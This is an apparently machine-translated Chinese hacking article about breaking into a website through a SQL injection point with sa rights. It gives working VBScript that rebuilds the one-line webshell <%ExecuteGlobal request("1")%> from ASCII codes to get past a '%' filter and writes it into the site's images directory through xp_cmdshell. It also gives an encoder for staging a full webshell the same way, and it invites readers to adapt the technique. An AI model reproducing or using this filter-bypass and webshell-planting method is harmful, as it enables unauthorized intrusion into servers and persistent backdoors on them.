当前位置:七道奇文章资讯安全技术网络技术
日期:2009-11-15 13:38:00  来源:本站整理

详解对无法写入的一次冲破[网络技术]

赞助商链接



  本文“详解对无法写入的一次冲破[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

根源:孤水绕城

本日和小猪一同搞站,asp脚本的一个sa权限的注入点,但是在echo一句话小马的时刻呈现了问题.%%以及里面的内容被过滤了.shell传不上去.ftp传不了,vbs下载也没有成功.不知道是%被过滤了,还是是被web防火墙拦阻了.最后想了下,用vbs写了一个脚本.

脚本内容以下:

echo Dim str:str="60 37 69 120 101 99 117 116 101 71 108 111 98 97 108 32 114 101 113 117 101 115 116 40 34 49 34 41 37 62":>c:\孤水绕城.vbs
echo Set fso=CreateObject("Scripting.FileSystemObject"):Set otfuser=fso.OpenTextFile("D:\Ittms-Web\common\images\shell.asp",2,true):For i = 0 To UBound(Split(str, Chr(32))):otfuser.write(Chr(Split(str, Chr(32))(i))):Next >>c:\孤水绕城.vbs


此中str为 <%ExecuteGlobal request("1")%>的asc码的情势.

传到服务器上,然后用xp——cmdshell履行cscript write.vbs后果成功的将一句话木马写入到了D:\Ittms-Web\common\images\目录中

然后我们再将大马转码一下然后赋值给str就行了,传到服务器中,直接运行就ok了.

转换成asc码的代码以下:

Set fso=CreateObject("Scripting.FileSystemObject"):
Set otfuser=fso.OpenTextFile("shell.asp",1,false):
Set savetext = fso.OpenTextFile("encode.txt",2,false):
Dim retstr
Dim readstr
Do While otfuser.AtEndOfLine <> True
readstr=otfuser.readline()
retstr = retstr&Str2Asc(readstr)&Asc(vbcrlf)&" "
Loop
savetext.write Trim(retstr)
Function Str2Asc(str)'sql的16进制转换函数
Dim s
For i = 1 To Len(str)
s = s & Asc(Mid(str,i,1))&Chr(32)
NExt
Str2Asc = s
End Function

很简单的一个脚本,大家按照实际情形,活学活用吧.
 


  以上是“详解对无法写入的一次冲破[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 详解对无法写入的一次冲破
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .